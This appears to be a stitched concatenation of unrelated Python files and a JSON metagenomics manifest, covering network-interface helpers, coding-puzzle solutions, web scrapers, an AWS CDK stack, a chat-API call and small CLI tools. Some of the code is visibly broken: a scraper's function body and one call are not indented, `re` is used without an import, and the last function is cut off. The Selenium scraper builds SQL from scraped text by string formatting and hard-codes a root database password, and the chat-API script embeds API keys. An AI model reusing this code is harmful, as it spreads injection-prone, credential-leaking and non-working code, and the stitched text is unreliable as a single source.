    Parses the output of `ip link show <iface>`.  Raises IFaceError when
    the command fails or its output cannot be interpreted.
    """
    check_cmd = ['ip', 'link', 'show', interface_name]
    proc = subprocess.Popen(check_cmd, stdout=subprocess.PIPE)
    out, err = proc.communicate()
    if out is None or proc.returncode != 0:
        raise IFaceError('Could not get interface state!')
    # FIX: Popen yields bytes but IFACE_STATUS_REGEX is a str pattern, so
    # match() raised TypeError — decode the output before matching.
    m = IFACE_STATUS_REGEX.match(out.decode('utf-8', errors='replace'))
    if m is not None and m.group(1) == interface_name:
        if m.group(3) == "UP":
            return True
        # Even when the state reads DOWN, the administrative UP flag may
        # still be set in the angle-bracket flag list.
        flag_list = m.group(2).split(',')
        return "UP" in flag_list
    raise IFaceError('Unknown error while getting interface state')
def set_interface_up(interface_name):
    """Bring `interface_name` up via `ip link set ... up`.

    Raises IFaceError only when the command fails AND produced output;
    silent non-zero exits are deliberately ignored (best-effort).
    """
    up_cmd = ['ip', 'link', 'set', interface_name, 'up']
    proc = subprocess.Popen(up_cmd, stdout=subprocess.PIPE)
    out, _ = proc.communicate()
    if proc.returncode != 0 and len(out) > 0:
        raise IFaceError('Could not set interface to UP state')
class WifiInfo(object):
    """Holds the basic attributes of one observed wi-fi access point."""

    def __init__(self, ap_bss):
        self.BSS = ap_bss            # access point BSS identifier
        self.SSID = None             # network name, filled in later
        self.current_signal = None   # last seen signal strength (dBm)
        self.has_key = False         # whether the AP is encrypted

    @staticmethod
    def from_dict(d):
        """Rebuild a WifiInfo whose attributes come straight from `d`."""
        info = WifiInfo(None)
        info.__dict__ = d
        return info

    def set_ssid(self, ssid):
        self.SSID = ssid

    def set_signal(self, signal):
        self.current_signal = signal

    def set_key(self, has_key):
        # Accepts a bool or the iw-style strings "on"/"off"; any other
        # value leaves the flag untouched.
        if has_key in (True, False):
            self.has_key = has_key
        elif has_key == "on":
            self.has_key = True
        elif has_key == "off":
            self.has_key = False

    def __repr__(self):
        return "[{}] ({}): {} dBm".format(self.BSS, self.SSID, self.current_signal)
class WifiInfoEncoder(JSONEncoder):
    """JSON-serialize WifiInfo objects via their attribute dict."""

    def default(self, o):
        # Represent any non-JSON-native object by its instance dict.
        return vars(o)
class WifiInfoDecoder(JSONDecoder):
    """JSON decoder that turns each decoded dict back into a WifiInfo."""

    def __init__(self):
        # FIX: JSONDecoder.__init__ takes keyword-only arguments; the old
        # super(...).__init__(self, object_hook=...) passed `self` as an
        # extra positional argument and raised TypeError on construction.
        super(WifiInfoDecoder, self).__init__(object_hook=self.dict_to_object)

    def dict_to_object(self, d):
        """Convert one decoded JSON dict into a WifiInfo instance.

        NOTE(review): the hook runs for every JSON object, so documents
        containing dicts without these keys will raise KeyError.
        """
        ret = WifiInfo(d['BSS'])
        ret.current_signal = d['current_signal']
        ret.has_key = d['has_key']
        ret.SSID = d['SSID']
        return ret
|
# -*- coding: utf-8 -*-
'''
@Author: Wengang.Zheng
@Email: zwg0606@gmail.com
@Filename: 接雨水.py
@Time: 2021-01-17-14:53:55
@Des:
核心思路:i位置的蓄水量由左右两边的最高柱子高度决定
water[i] = min(
# 左边最高的柱子
max(height[0..i]),
# 右边最高的柱子
max(height[i..end])
) - height[i]
'''
def violent_trap(heights):
    """
    @brief Trapping rain water, brute force: O(n^2) via repeated scans
    @details https://leetcode-cn.com/problems/trapping-rain-water/
    @param heights: list for height
    @return res: num for trapping water(int)
    """
    total = 0
    for i, h in enumerate(heights):
        # Water above column i is bounded by the tallest bar on each side
        # (including the column itself).
        highest_left = max([h] + heights[:i])
        highest_right = max([h] + heights[i + 1:])
        total += min(highest_left, highest_right) - h
    return total
def dp_trap(heights):
    """
    @brief Trapping rain water with prefix/suffix max tables: O(n) time,
           O(n) extra space
    @details https://leetcode-cn.com/problems/trapping-rain-water/
    @param heights: list for height
    @return res: num for trapping water(int)

    FIX: the tables were previously filled with max() over a slice at every
    index, making the build O(n^2) and contradicting the advertised O(n)
    bound; they are now running maxima computed in one pass each.
    """
    n = len(heights)
    if n == 0:
        return 0
    # table_l[i] = max(heights[i:])  (tallest bar at or right of i)
    # table_r[i] = max(heights[:i+1]) (tallest bar at or left of i)
    table_l = [0] * n
    table_r = [0] * n
    table_l[n - 1] = heights[n - 1]
    for i in range(n - 2, -1, -1):
        table_l[i] = max(heights[i], table_l[i + 1])
    table_r[0] = heights[0]
    for i in range(1, n):
        table_r[i] = max(heights[i], table_r[i - 1])
    # Water at i is bounded by the lower of the two running maxima.
    res = 0
    for i in range(n):
        res += min(table_l[i], table_r[i]) - heights[i]
    return res
def twopoint_trap(heights):
    """
    @brief Trapping rain water, two pointers: O(n) time, O(1) extra space
    @details https://leetcode-cn.com/problems/trapping-rain-water/
    @param heights: list for height
    @return res: num for trapping water(int)

    FIX: an empty `heights` previously raised IndexError on heights[0];
    it now returns 0.
    """
    if not heights:
        return 0
    left, right = 0, len(heights) - 1
    l_max, r_max = heights[0], heights[-1]
    res = 0
    # Move the pointers toward each other; the lower of the two running
    # maxima fully determines the water level on its side.
    while left < right:
        l_max = max(l_max, heights[left])
        r_max = max(r_max, heights[right])
        if l_max < r_max:
            res += l_max - heights[left]
            left += 1
        else:
            res += r_max - heights[right]
            right -= 1
    return res
if __name__ == '__main__':
    # Smoke-test all three implementations against the same sample.
    heights = [4, 2, 0, 3, 2, 5]
    for solver in (violent_trap, dp_trap, twopoint_trap):
        assert solver(heights) == 9
    print("All test passed!")
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2017/8/16 17:52
# @Author : Geda
import requests
import re
import urllib
import os
import sys
# Python 2 only: reload(sys) re-exposes setdefaultencoding (hidden by
# site.py) so the process-wide default str encoding can be forced to UTF-8.
reload(sys)
sys.setdefaultencoding('utf8')
def get_response(url):
    """Fetch `url` and return the response body as text."""
    return requests.get(url).text
def get_content(html):
    """Return the outer HTML of every post container div in `html`."""
    # re.S lets '.' span the newlines inside each div block.
    pattern = re.compile(r'(<div class="j-r-list-c">.*?</div>.*?</div>)', re.S)
    return pattern.findall(html)
def get_mp4_url(content):
    """Return every data-mp4 attribute value found in `content`."""
    return re.findall(r'data-mp4="(.*?)"', content)
def get_mp4_name(response):
    """Return the link text of every /detail-XXXXXXXX.html anchor."""
    detail_link = re.compile(r'<a href="/detail-.{8}.html">(.*?)</a>')
    return detail_link.findall(response)
def downmp4(mp4_url,path):
    # Build a Windows target path from the post title: strip all whitespace,
    # then (Python 2) re-encode the UTF-8 title to GBK for the local
    # filesystem.
    path = ''.join(path.split())
    path = 'E:\\xx\\{}.mp4'.format(path.decode('utf-8').encode('gbk'))
    # Download only when the target file does not already exist.
    if not os.path.exists(path):
        urllib.urlretrieve(mp4_url,path)
        print 'ok!'
    else:
        print 'no!'
def get_url_name(start_url):
    """Scrape one listing page: extract each post's mp4 url and title,
    then download the video."""
    for block in get_content(get_response(start_url)):
        mp4_url = get_mp4_url(block)
        if mp4_url:
            mp4_name = get_mp4_name(block)
            downmp4(mp4_url[0], mp4_name[0])
# Entry point: scrape the budejie front page when run as a script.
if __name__ == '__main__':
    start_url ='http://www.budejie.com/'
    get_url_name(start_url)
|
# -*-coding = utf-8-*-
# __author:"NGLS Chuang"
# @time:2019/12/4 15:39
import os
import sys
# 导入路径
from ChooseCourseSystem.core import data
from ChooseCourseSystem.core import education
# BASE_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# sys.path.append(BASE_PATH)
# print(BASE_PATH)
# 创建学校
def add_school():
    """Interactively collect a school's name and address, then persist it."""
    print('填写学校信息')
    name = input('请正确填写学校名(汉字)')
    address = input('地址:')
    data.update_school(education.School(name, address))
# 创建班级
def add_grade():
    """Interactively create a grade (class): pick its school, teacher and
    course, then persist the grade and the updated school.

    FIX: None checks now use the idiomatic `is None` instead of `== None`.
    """
    print('请填写班级信息')
    grade_name = input('名称 :')
    data.print_schools()
    school_name = input('选择学校,输入完整学校名')
    school = data.get_school(school_name)
    if school is None:
        print('您输入的有误')
        return
    print('选择教师')
    data.print_teachers()
    teacher_name = input('选择教师')
    teacher = data.get_teacher(teacher_name)
    if teacher is None:
        print('您输入的教师名有误')
        return
    print("选择课程:")
    data.print_courses()
    course_name = input("课程名:")
    course = data.get_course(course_name)
    if course is None:
        print("课程选择错误")
        return
    grade = education.School.create_grade(school, grade_name, course)
    education.Grade.sign_in_teacher(grade, teacher)
    data.update_grade(grade)
    data.update_school(school)
# 创建课程
def add_course():
    """Interactively create a course under a chosen school and persist both.

    FIX: None check now uses the idiomatic `is None` instead of `== None`.
    """
    print('请填写课程信息')
    course_name = input('课程名称:')
    cycle = input('周期:')
    price = input('价格: ')
    print('选择学校')
    data.print_schools()
    school_name = input("学校名:")
    school = data.get_school(school_name)
    if school is None:
        print("学校选择错误")
        return
    # NOTE(review): `creat_course` is the project API's (misspelled) name.
    course = education.School.creat_course(school, course_name, cycle, price)
    data.update_course(course)
    data.update_school(school)
def add_teacher():
    """Interactively create a teacher under a chosen school and persist both.

    FIX: None check now uses the idiomatic `is None` instead of `== None`.
    """
    print('请填写老师信息')
    teacher_name = input('教师姓名:')
    print('选择学校')
    data.print_schools()
    school_name = input('学校名:')
    school = data.get_school(school_name)
    if school is None:
        print('学校选择错误')
        return
    teacher = education.School.creat_teacher(school, teacher_name)
    data.update_teacher(teacher)
    data.update_school(school)
    print('老师已经创建OK')
def show_schools():
    """Print every known school."""
    data.print_schools()
def show_courses():
    """Print every known course."""
    data.print_courses()
def show_teachers():
    """Print every known teacher."""
    data.print_teachers()
def show_grades():
    """Print every known grade."""
    data.print_grades()
def show_teacher():
    """Prompt for a teacher name and print that teacher's details.

    FIX: None check now uses the idiomatic `is None` instead of `== None`.
    """
    print("选择老师:")
    data.print_teachers()
    teacher_name = input("老师名:")
    teacher = data.get_teacher(teacher_name)
    if teacher is None:
        print("老师选择错误")
        return
    teacher.show_info()
def run():
    """Interactive menu loop for the school-admin view."""
    print("学校视图:")
    print("=" * 20)
    # Menu choice -> handler; "0" exits, unknown input re-prompts.
    actions = {
        "1": add_school,
        "2": add_teacher,
        "3": add_course,
        "4": add_grade,
        "5": show_schools,
        "6": show_teachers,
        "7": show_courses,
        "8": show_grades,
        "9": show_teacher,
    }
    while True:
        print("1.增加学校\n2.增加老师\n3.增加课程\n4.增加班级\n"
              "5.查看学校\n6.查看老师\n7.查看课程\n8.查看班级\n"
              "9.查看教师详细\n"
              "0.退出")
        res = input("输入序号:")
        if res == "0":
            print("退出成功!")
            break
        handler = actions.get(res)
        if handler is None:
            print("请选择正确的编号")
        else:
            handler()
if __name__ == "__main__":
run()
|
def printinfo():
    """Print a short slogan framed by dashed border lines."""
    border = "---" * 10
    print(border)
    print(" python就是简洁")
    print(border)
def add2(a, b):
    """Print (not return) the sum of a and b."""
    print(a + b)
def add2num(a, b):
    """Return the sum of a and b."""
    return a + b
# Returning multiple values: quotient and remainder as a tuple.
def divide(a, b):
    """Return (a // b, a % b)."""
    return a // b, a % b
# Demo calls for the functions defined above.
printinfo()
add2(11, 21)
print(add2num(11, 22))
quotient, remainder = divide(5, 2)
print(quotient, remainder)
from aws_cdk import core as cdk
from aws_cdk import aws_dynamodb as _ddb
import os
class GlobalArgs:
    """
    Helper to define global statics
    """
    # Static metadata stamped onto stacks/outputs for traceability.
    OWNER = "MystiqueAutomation"
    ENVIRONMENT = "production"
    REPO_NAME = "glue-elastic-views-on-s3"
    SOURCE_INFO = f"https://github.com/miztiik/{REPO_NAME}"
    VERSION = "2021_03_07"
    MIZTIIK_SUPPORT_EMAIL = ["mystique@example.com", ]
class DynamoDBStack(cdk.Stack):
    """Provision the source DynamoDB movies table for Glue Elastic Views."""

    def __init__(
        self,
        scope: cdk.Construct,
        construct_id: str,
        stack_log_level: str,
        **kwargs
    ) -> None:
        super().__init__(scope, construct_id, **kwargs)
        id_prefix_str = f"elasticViews"
        ddb_table_name = "elasticViewsMoviesTable_2021"
        # Movies table keyed by (year, title).  RemovalPolicy.DESTROY makes
        # demo teardown clean — table data is lost on stack deletion.
        movies_table = _ddb.Table(
            self,
            f"{id_prefix_str}SrcDdb",
            partition_key=_ddb.Attribute(
                name="year",
                type=_ddb.AttributeType.NUMBER
            ),
            sort_key=_ddb.Attribute(
                name="title",
                type=_ddb.AttributeType.STRING
            ),
            read_capacity=50,
            write_capacity=50,
            table_name=f"{ddb_table_name}",
            removal_policy=cdk.RemovalPolicy.DESTROY
        )
        ###########################################
        ################# OUTPUTS #################
        ###########################################
        output_0 = cdk.CfnOutput(
            self,
            "AutomationFrom",
            value=f"{GlobalArgs.SOURCE_INFO}",
            description="To know more about this automation stack, check out our github page."
        )
        output_1 = cdk.CfnOutput(
            self,
            "srcMoviesDdbTable",
            # FIX: this output previously linked to the EventBridge console
            # (events/home ... #/eventbus/<table>) — a copy-paste slip; it
            # now links to the DynamoDB table console page.
            value=f"https://console.aws.amazon.com/dynamodbv2/home?region={cdk.Aws.REGION}#table?name={movies_table.table_name}",
            description="Source Dynamodb table for Glue Elastic Views"
        )
|
# -*- coding: utf-8 -*-
# Python 2 only: urllib2 and urllib.urlencode were reorganized into
# urllib.request / urllib.parse in Python 3.
import urllib2
from urllib import urlencode
# Turing robot chat API endpoint, proxied through apis.baidu.com.
url = 'http://apis.baidu.com/turing/turing/turing'
req = urllib2.Request(url)
# NOTE(review): hard-coded API credentials below — these should be moved
# out of source control (environment variables or a config file).
req.add_header('apikey', '1b7f52ccc223f79eb67ab1cc25af0ab7')
urlParam = {
    'key': '879a6cb3afb84dbf4fc84a1df2ab7319',
    'info': '你好',
    'userid': '张三'
}
# POST the form-encoded parameters and print the raw response body.
urlParam = urlencode(urlParam)
resp = urllib2.urlopen(req, urlParam)
content = resp.read()
print (content)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys

# Pipeline driver: each stage module is imported lazily right before its
# main() runs, with progress written to stdout between stages.

print("hi")
# FIX: removed `process.stdout.readline()` — `process` was never defined
# in this script (it looks like a leftover from a Node.js-style template)
# and raised NameError before any stage could run.
sys.stdout.flush()
sys.stdout.write("\n")

sys.stdout.write("running bigQuery ETL...")
import ETLbiqQueryData
ETLbiqQueryData.main()
sys.stdout.flush()
sys.stdout.write("Done!")
sys.stdout.write("\n")

sys.stdout.write("cleaning media plan...")
import cleanMediaPlan
cleanMediaPlan.main()
sys.stdout.flush()
sys.stdout.write("Done!")
sys.stdout.write("\n")

sys.stdout.write("running main process...")
import mainProcess
mainProcess.main()
sys.stdout.flush()
sys.stdout.write("Done!")
sys.stdout.write("\n")

sys.stdout.write("merging results...")
import letsGetMarried
letsGetMarried.main()
sys.stdout.flush()
sys.stdout.write("Done!")


def main():
    """ Main program """
    # NOTE(review): unused — all of the work above happens at import time.
    return 0


if __name__ == "__main__":
    main()
{
"id": "mgm4456372.3",
"metadata": {
"mgm4456372.3.metadata.json": {
"format": "json",
"provider": "metagenomics.anl.gov"
}
},
"providers": {
"metagenomics.anl.gov": {
"files": {
"100.preprocess.info": {
"compression": null,
"description": null,
"size": 736,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/100.preprocess.info"
},
"100.preprocess.passed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 56284,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/100.preprocess.passed.fna.gz"
},
"100.preprocess.passed.fna.stats": {
"compression": null,
"description": null,
"size": 309,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/100.preprocess.passed.fna.stats"
},
"100.preprocess.removed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 896,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/100.preprocess.removed.fna.gz"
},
"100.preprocess.removed.fna.stats": {
"compression": null,
"description": null,
"size": 305,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/100.preprocess.removed.fna.stats"
},
"205.screen.h_sapiens_asm.info": {
"compression": null,
"description": null,
"size": 448,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/205.screen.h_sapiens_asm.info"
},
"299.screen.info": {
"compression": null,
"description": null,
"size": 410,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/299.screen.info"
},
"299.screen.passed.fna.gcs": {
"compression": null,
"description": null,
"size": 1171,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/299.screen.passed.fna.gcs"
},
"299.screen.passed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 53310,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/299.screen.passed.fna.gz"
},
"299.screen.passed.fna.lens": {
"compression": null,
"description": null,
"size": 335,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/299.screen.passed.fna.lens"
},
"299.screen.passed.fna.stats": {
"compression": null,
"description": null,
"size": 309,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/299.screen.passed.fna.stats"
},
"440.cluster.rna97.fna.gz": {
"compression": "gzip",
"description": null,
"size": 12434,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/440.cluster.rna97.fna.gz"
},
"440.cluster.rna97.fna.stats": {
"compression": null,
"description": null,
"size": 306,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/440.cluster.rna97.fna.stats"
},
"440.cluster.rna97.info": {
"compression": null,
"description": null,
"size": 947,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/440.cluster.rna97.info"
},
"440.cluster.rna97.mapping": {
"compression": null,
"description": null,
"size": 57457,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/440.cluster.rna97.mapping"
},
"440.cluster.rna97.mapping.stats": {
"compression": null,
"description": null,
"size": 48,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/440.cluster.rna97.mapping.stats"
},
"450.rna.expand.lca.gz": {
"compression": "gzip",
"description": null,
"size": 79198,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/450.rna.expand.lca.gz"
},
"450.rna.expand.rna.gz": {
"compression": "gzip",
"description": null,
"size": 20811,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/450.rna.expand.rna.gz"
},
"450.rna.sims.filter.gz": {
"compression": "gzip",
"description": null,
"size": 14683,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/450.rna.sims.filter.gz"
},
"450.rna.sims.gz": {
"compression": "gzip",
"description": null,
"size": 149201,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/450.rna.sims.gz"
},
"900.abundance.function.gz": {
"compression": "gzip",
"description": null,
"size": 8003,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/900.abundance.function.gz"
},
"900.abundance.lca.gz": {
"compression": "gzip",
"description": null,
"size": 7710,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/900.abundance.lca.gz"
},
"900.abundance.md5.gz": {
"compression": "gzip",
"description": null,
"size": 11983,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/900.abundance.md5.gz"
},
"900.abundance.ontology.gz": {
"compression": "gzip",
"description": null,
"size": 43,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/900.abundance.ontology.gz"
},
"900.abundance.organism.gz": {
"compression": "gzip",
"description": null,
"size": 17532,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/900.abundance.organism.gz"
},
"900.loadDB.sims.filter.seq": {
"compression": null,
"description": null,
"size": 1360496,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/900.loadDB.sims.filter.seq"
},
"900.loadDB.source.stats": {
"compression": null,
"description": null,
"size": 118,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/900.loadDB.source.stats"
},
"999.done.COG.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/999.done.COG.stats"
},
"999.done.KO.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/999.done.KO.stats"
},
"999.done.NOG.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/999.done.NOG.stats"
},
"999.done.Subsystems.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/999.done.Subsystems.stats"
},
"999.done.class.stats": {
"compression": null,
"description": null,
"size": 543,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/999.done.class.stats"
},
"999.done.domain.stats": {
"compression": null,
"description": null,
"size": 36,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/999.done.domain.stats"
},
"999.done.family.stats": {
"compression": null,
"description": null,
"size": 1701,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/999.done.family.stats"
},
"999.done.genus.stats": {
"compression": null,
"description": null,
"size": 2125,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/999.done.genus.stats"
},
"999.done.order.stats": {
"compression": null,
"description": null,
"size": 811,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/999.done.order.stats"
},
"999.done.phylum.stats": {
"compression": null,
"description": null,
"size": 289,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/999.done.phylum.stats"
},
"999.done.rarefaction.stats": {
"compression": null,
"description": null,
"size": 27201,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/999.done.rarefaction.stats"
},
"999.done.sims.stats": {
"compression": null,
"description": null,
"size": 79,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/999.done.sims.stats"
},
"999.done.species.stats": {
"compression": null,
"description": null,
"size": 5826,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4456372.3/file/999.done.species.stats"
}
},
"id": "mgm4456372.3",
"provider": "metagenomics.anl.gov",
"providerId": "mgm4456372.3"
}
},
"raw": {
"mgm4456372.3.fna.gz": {
"compression": "gzip",
"format": "fasta",
"provider": "metagenomics.anl.gov",
"url": "http://api.metagenomics.anl.gov/reads/mgm4456372.3"
}
}
} |
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from fake_useragent import UserAgent
import MySQLdb
from multiprocessing.dummy import Pool as ThreadPool
# from multiprocessing import Pool
import time
# sql='create table jobbole(title char(100),text_type char(20),time char(16),content text);'
def get_single_page_info(url):
conn=MySQLdb.connect(host='localhost',user='root',passwd='rootroot',db='mydb',charset='utf8')
cursor=conn.cursor()
start=time.time()
# ua=UserAgent()
# print ua.random
dcap=dict(DesiredCapabilities.PHANTOMJS)
dcap['phantomjs.page.settings.userAgent']='Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'
# dcap['phantomjs.page.settings.userAgent']=ua.random
driver=webdriver.PhantomJS(desired_capabilities=dcap)
# driver=webdriver.PhantomJS()
driver.get(url)
titles=driver.find_elements_by_class_name('archive-title')
types=driver.find_elements_by_xpath('//a[@rel="category tag"]')
times=driver.find_elements_by_xpath('//*[@id="archive"]/div/div/p[1]')
contents=driver.find_elements_by_class_name('excerpt')
for t,y,i,c in zip(titles,types,times,contents):
# print t.text,'-------',y.text,'-------',(re.search(r'\d{4}/\d{2}/\d{2}',i.text)).group()
title=t.text
text_type=y.text
pub_time=(re.search(r'\d{4}/\d{2}/\d{2}',i.text)).group()
content=c.text
sql='insert into jobbole1(title,text_type,time,content) values("%s","%s","%s","%s");'%(title,text_type,pub_time,content)
try:
cursor.execute(sql)
conn.commit()
except Exception,e:
print e
print title,'---',text_type,'---',pub_time,'++++++++++++'
print url
print time.time()-start
driver.close()
cursor.close()
conn.close()
# Module-level driver: scrape the first 50 listing pages in parallel.
starttime=time.time()
# Lazy generator of the 50 listing-page URLs.
urls=('http://python.jobbole.com/all-posts/page/%s'% i for i in range(1,51))
# Thread (not process) pool: the work is network-bound, so 4 threads suffice.
pool=ThreadPool(4)
pool.map(get_single_page_info, urls)
pool.close()
pool.join()
print time.time()-starttime
print '--------Over--------'
#!/bin/python3
import math
import os
import random
import re
import sys
def getWays(n, c):
    """Count the distinct ways to make change for amount *n* using the
    coin denominations in *c* (classic unbounded coin-change DP)."""
    # ways[a] holds the number of combinations summing to amount a.
    ways = [1] + [0] * n
    for denom in c:
        # Forward sweep lets each denomination be reused unboundedly.
        for amount in range(denom, n + 1):
            ways[amount] += ways[amount - denom]
    return ways[n]
if __name__ == '__main__':
    # HackerRank-style harness: first line holds the target amount n and the
    # coin count m; second line holds the denominations. The answer is
    # written to the file named by OUTPUT_PATH.
    fptr = open(os.environ['OUTPUT_PATH'], 'w')
    nm = input().split()
    n = int(nm[0])
    # m (number of coins) is parsed for the input format but not needed.
    m = int(nm[1])
    c = list(map(int, input().rstrip().split()))
    fptr.write(str(getWays(n, c)))
    fptr.close()
|
import os
from conans import ConanFile, tools
class SmlConan(ConanFile):
    """Conan recipe for [Boost].SML, a header-only C++14 state machine
    library — packaging simply ships the include tree."""
    name = "SML"
    version = "latest"
    license = "Boost"
    url = "https://github.com/paulbendixen/sml.git"
    description = "[Boost].SML: C++14 State Machine Library"
    #no_copy_source = True
    # No settings/options are necessary, this is header only
    exports_sources = "include/*"

    def package(self):
        # Header-only: copy every header into the package's include dir.
        self.copy("*", src="include", dst="include")
|
import string
from collections import Counter
import matplotlib.pyplot as plt
from nltk.corpus import stopwords
from nltk.sentiment.vader import SentimentIntensityAnalyzer
from nltk.stem import WordNetLemmatizer
from nltk.tokenize import word_tokenize
# Load the input text and normalize it: lower-case, strip all punctuation.
text = open('read.txt', encoding='utf-8').read()
lower_case = text.lower()
cleaned_text = lower_case.translate(str.maketrans('', '', string.punctuation))
# Using word_tokenizer
tokenized_words = word_tokenize(cleaned_text, "english")
# Removing Stop Words
final_words = []
for word in tokenized_words:
    if word not in stopwords.words('english'):
        final_words.append(word)
# Lemmatization - From plural to single + Base form of a word
lemma_words = []
for word in final_words:
    word = WordNetLemmatizer().lemmatize(word)
    lemma_words.append(word)
# Collect the emotion tag of every lemmatized word found in the lexicon.
# The cleanup below implies lines shaped like "'word': emotion," — quotes,
# commas and the newline are stripped before splitting on ':'.
emotion_list = []
with open('emotions.txt', 'r') as file:
    for line in file:
        clear_line = line.replace("\n", '').replace(",", '').replace("'", '').strip()
        word, emotion = clear_line.split(':')
        if word in lemma_words:
            emotion_list.append(emotion)
print(emotion_list)
# Frequency count of each detected emotion (drives the bar chart below).
w = Counter(emotion_list)
def sentiment_analyse(sentiment_text):
    """Classify *sentiment_text* with VADER polarity scores.

    Returns "Positive Sentiment", "Negative Sentiment" or
    "Neutral Sentiment" depending on which polarity dominates.
    """
    scores = SentimentIntensityAnalyzer().polarity_scores(sentiment_text)
    negative, positive = scores['neg'], scores['pos']
    if positive > negative:
        return "Positive Sentiment"
    if negative > positive:
        return "Negative Sentiment"
    return "Neutral Sentiment"
# Overall sentiment of the whole cleaned text, used as the chart title.
sentiment = sentiment_analyse(cleaned_text)
# Bar chart of emotion frequencies, saved to graph.png and shown.
fig, ax1 = plt.subplots()
ax1.bar(w.keys(), w.values())
plt.title(sentiment)
plt.xlabel("emotions")
plt.ylabel("frequency")
# Slant the x tick labels so long emotion names don't overlap.
fig.autofmt_xdate()
plt.savefig('graph.png')
plt.show()
from datetime import datetime
import pandas as pd
print('\nSistema de cadastro de anúncios.\n')
anuncio = []
# Registration function
def cadastro():
    """Prompt for a new ad's data and append it to the module-level
    `anuncio` list as (name, client, start, end, "<n> dias", daily budget)."""
    nome = input('Digite o nome do anúncio: ')
    cliente = input('Digite o nome do cliente: ')
    # Start date
    dataInicio = datetime.strptime(input(f'Digite a data de início (dd-mm-aaaa):'), '%d-%m-%Y')
    # End date
    dataFim = datetime.strptime(input(f'Digite a data de término (dd-mm-aaaa):'), '%d-%m-%Y')
    # Inclusive day count; abs() tolerates end < start.
    quantidade_dias = abs((dataFim - dataInicio).days) + 1
    investimentoTotal = int(input('Digite o valor do investimento total: '))
    # Budget spread evenly over the campaign days.
    investimentoDiario = investimentoTotal / quantidade_dias
    anuncio.append((nome, cliente, dataInicio, dataFim, f'{quantidade_dias} dias', investimentoDiario))
# Function to display all registered ads
def visualizar():
    """Render every registered ad as a pandas DataFrame and print it."""
    dados = pd.DataFrame(anuncio, columns=['NomeAnúncio', 'Cliente', 'DataInício', 'DataFinal', 'Quant.Dias', 'Invest.Diário'])
    print(dados)
# Function to filter ads by client name
def filtro():
    """Prompt for a client name and print only that client's ads.
    The match is exact (case-sensitive)."""
